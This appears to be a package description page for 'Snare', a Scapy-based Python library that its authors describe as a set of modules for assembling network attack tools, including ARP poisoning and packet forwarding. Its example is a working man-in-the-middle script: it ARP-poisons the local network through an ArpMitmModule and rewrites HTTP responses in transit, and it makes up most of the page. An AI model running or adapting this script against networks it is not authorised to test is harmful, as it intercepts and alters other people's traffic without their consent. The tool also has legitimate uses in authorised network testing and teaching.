Network capture and manipulation module
Project description
Capture and manipulate traffic off the network
Snare provides a Sniffer class and a few “modules” which can be assembled to form attack tools. These classes are based on Scapy and provide a convenient way to interact with and compose tools from it’s functionality.
The advanced functions such as ARP poisoning, packet forwarding, and analysis are decomposed into modules to allow for greater flexibility and flexibility. Look at the constructed strategies for examples of how to compose the modules.
Docs are hosted on Read the Docs
Example
Suppose you hate the string “search” and you want to MitM your local network, replacing all instances of the word in HTTP responses with the word “replace”. Well the following script will do that for you!
import scapy.all as scapy
import snare
# Hello
@snare.tcpfilter
def inject(pkt):
if all(layer in pkt for layer in (scapy.IP, scapy.TCP)):
if scapy.Raw in pkt and pkt[scapy.TCP].sport == 80:
s = b"search"
r = b"replacement"
raw = pkt[scapy.Raw]
if s in raw.load:
raw.load = raw.load.replace(s, r)
print(pkt.show())
return pkt
sniffer = snare.Sniffer(
iface="eth0",
modules=[snare.ArpMitmModule(filter=inject)]
)
sniffer.start()
input("Starting injection attack. Press enter to quit.")
sniffer.stop()Development
Testing
Tests are written in pytest and can be run with the pytest command.
Documentation
Documentation can be built with Sphinx from the docs folder by running make html, or another target.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
